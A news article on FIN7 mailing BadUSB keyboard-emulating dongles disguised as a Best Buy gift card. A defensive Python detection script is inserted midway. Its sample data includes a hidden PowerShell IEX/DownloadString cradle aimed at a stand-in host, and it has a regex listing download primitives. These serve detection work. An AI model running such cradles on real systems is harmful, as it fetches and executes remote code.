Security researchers have come across an attack in which a USB dongle designed to surreptitiously behave like a keyboard was mailed to a company under the guise of a Best Buy gift card. This technique has been used by security professionals during physical penetration testing engagements in the past, but it has very rarely been observed in the wild. This time, a known, sophisticated cybercriminal group is likely behind it.
The attack was analyzed and disclosed by security researchers from Trustwave SpiderLabs, who learned about it from a business associate of one of their team members. Ziv Mador, vice president of security research at Trustwave SpiderLabs, tells CSO that a US company in the hospitality sector received the USB dongle sometime in mid-February.
The package contained an official-looking letter with Best Buy’s logo and other branding elements informing the recipient that they had received a $50 gift card for being a regular customer. “You can spend it on any product from the list of items presented on a USB stick,” the letter read. Fortunately, because the person who received it had security training, the USB dongle was never inserted into any computer and was instead passed along for analysis.
Researchers traced the USB dongle model to a Taiwanese website where it is sold for the equivalent of $7 under the name BadUSB Leonardo USB ATMEGA32U4. In 2014, at the Black Hat USA security conference, a team of researchers from Berlin-based Security Research Labs (SRLabs) demonstrated that the firmware of many USB dongles can be reprogrammed so that, when inserted in a computer, the device reports that it is actually a keyboard and starts sending commands that could be used to deploy malware. The researchers dubbed this attack BadUSB, and it is different from simply putting malware on a USB stick and relying on the user to open it.
“The fact that they are also cheap and readily available to anyone meant that it was just a matter of time to see this technique used by criminals in the wild,” the Trustwave researchers said in their report. “Since USB devices are ubiquitous, used and seen everywhere, some consider them innocuous and safe. Others can be very curious about the contents of an unknown USB device. If this story teaches us anything, it’s that one should never trust such a device.”
Mador tells CSO that his team did not know who the attackers were, but after seeing the information in Trustwave’s report, security researchers Costin Raiu from Kaspersky Lab and Michael Yip commented on Twitter that the malware and infrastructure used match those used by the FIN7 gang.
FIN7, also known as Carbanak, is a financially motivated cybercriminal group that has been targeting US-based companies from the retail, restaurant and hospitality sectors since around 2015. The group is known for using sophisticated techniques to move laterally inside networks and compromised systems with the goal of stealing payment card information. Researchers from security firm Morphisec estimated in the past that FIN7 members earn around $50 million a month from their activities.
The target in the BadUSB attack was a company from the US hospitality sector, which is in line with FIN7’s previous targeting, but while the malware (GRIFFON) and infrastructure match FIN7’s, Raiu tells CSO that this is the first time he has seen the group use this physical, USB dongle-based attack vector.
“We expect that this campaign dates back to at least December 2019, based on submissions we observed in VirusTotal,” Barry Vengerik, technical director of Technical Operations and Reverse Engineering (TORE) at FireEye, tells CSO. “FireEye Intelligence has been tracking FIN7 sending US-based organizations packages via USPS that contained USB devices configured to deliver malware. When the USB device is connected to a PC, it functions as a virtual keyboard, launching an instance of cmd.exe and executing a PowerShell command crafted to download a remotely hosted PowerShell script designed to launch an instance of the GRIFFON backdoor.”
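The chain Vengerik describes (a new keyboard device appearing, then cmd.exe launching a PowerShell command that downloads a script) is something defenders can correlate in endpoint telemetry. The following is an added example, not code from the article, Trustwave or FireEye; the event records, field names and one-minute window are constructed for illustration rather than taken from a real Sysmon or EDR schema.

```python
# Heuristic correlation for the BadUSB chain: a newly attached USB keyboard
# (HID) followed within a short window by cmd.exe/PowerShell running a
# download cradle. Event format below is constructed for this example.
import re
from datetime import datetime, timedelta

# Constructed sample telemetry: (timestamp, event type, details).
SAMPLE_EVENTS = [
    ("2020-03-26T09:14:02", "device_add",
     {"class": "HID", "desc": "USB Keyboard"}),
    ("2020-03-26T09:14:05", "process_create",
     {"image": "cmd.exe", "parent": "explorer.exe",
      "cmdline": 'cmd.exe /c powershell -w hidden -c "IEX (New-Object Net.WebClient)'
                 ".DownloadString('http://example.invalid/x.ps1')\""}),
    ("2020-03-26T11:30:00", "process_create",          # benign admin script
     {"image": "powershell.exe", "parent": "explorer.exe",
      "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"}),
]

# Common remote-download primitives seen in PowerShell one-liners.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                    r"\bIEX\b|Invoke-Expression", re.I)

def is_cradle(cmdline: str) -> bool:
    """True when a PowerShell command line carries a download/execute primitive."""
    return "powershell" in cmdline.lower() and CRADLE.search(cmdline) is not None

def find_badusb_chains(events, window_seconds=60):
    """Return (keyboard_time, process_time, cmdline) for each cradle that starts
    within window_seconds of a new HID keyboard being attached."""
    hits, recent_keyboards = [], []
    for ts, kind, d in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        if kind == "device_add" and d.get("class") == "HID" \
                and "keyboard" in d.get("desc", "").lower():
            recent_keyboards.append(t)
        elif kind == "process_create" and is_cradle(d.get("cmdline", "")):
            for kt in recent_keyboards:
                if timedelta(0) <= t - kt <= timedelta(seconds=window_seconds):
                    hits.append((kt.isoformat(), ts, d["cmdline"]))
                    break
    return hits

if __name__ == "__main__":
    for keyboard_time, proc_time, cmdline in find_badusb_chains(SAMPLE_EVENTS):
        print(f"keyboard at {keyboard_time}, cradle at {proc_time}: {cmdline}")
```

A real deployment would feed this from the endpoint's device-arrival and process-creation events; a legitimate keyboard plugged in moments before an admin runs a download command is the expected false positive, so treat a hit as a triage signal rather than a verdict.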
The FBI also sent a private alert to companies on Thursday confirming that FIN7 is behind these physical USB-based attacks. The agency said it received reports of several packages that contained items including malicious USB devices that were sent to businesses from the retail, restaurant and hotel industries via USPS. The alert contains more technical details, pictures of the packages and USB devices, as well as recommendations to businesses on what information to report back to the FBI in case they’re targeted.
More BadUSB attacks on the way?
Attacks involving USB dongles reprogrammed to act as keyboards have not been used widely until now because they’re not very scalable. One such dongle that’s popular with penetration testers is the USB Rubber Ducky. It’s made by a company called Hak5 and costs $50, which is not a lot of money for a professional to spend, but adds up quickly if you’re an attacker and want to infect many victims, especially since the success rate won’t be 100 percent.
However, at $7 apiece (and probably less if bought in large quantities), malicious dongles like the BadUSB Leonardo device make real-world BadUSB attacks much more viable. Attackers do not even have to put in much effort, such as creating custom firmware to convert off-the-shelf, non-malicious USB sticks into malicious ones. They just need to load their custom payload into a ready-made device and mail it.
Even so, attacks of this type are expected to target a relatively small number of carefully selected companies that attackers have already done some research on. According to Trustwave’s Mador, the choice of impersonating Best Buy might not have been an accident. Attackers can use online information to find a company’s contractors and suppliers.
Also, in this case, the rogue letter was sent to the business’s address, but with senior and other key employees now working from home due to the COVID-19 pandemic, the risk is even higher.
At work, such letters would probably be received by administrative staff, who might then take the device to the IT or security team if they have been trained properly, so several people might look at the device before it is used, Mador says. However, at home there is no security staff, and even if the intended recipient received security awareness training at work, the device might be found and used by one of their family members before they have a chance to stop it.
If hackers compromise a device on the victim’s home network, they will eventually succeed in hacking into their work computer as well, which will probably provide them with access to the company’s network or systems via a VPN connection. That is why security professionals are concerned about the forced work-from-home situation that is currently in effect.
“People know by now that they shouldn’t click on links or open attachments from unknown or untrusted sources,” Mador says. “But when it comes to USB dongles, many still don’t use the right judgement.”
Copyright © 2020 IDG Communications, Inc.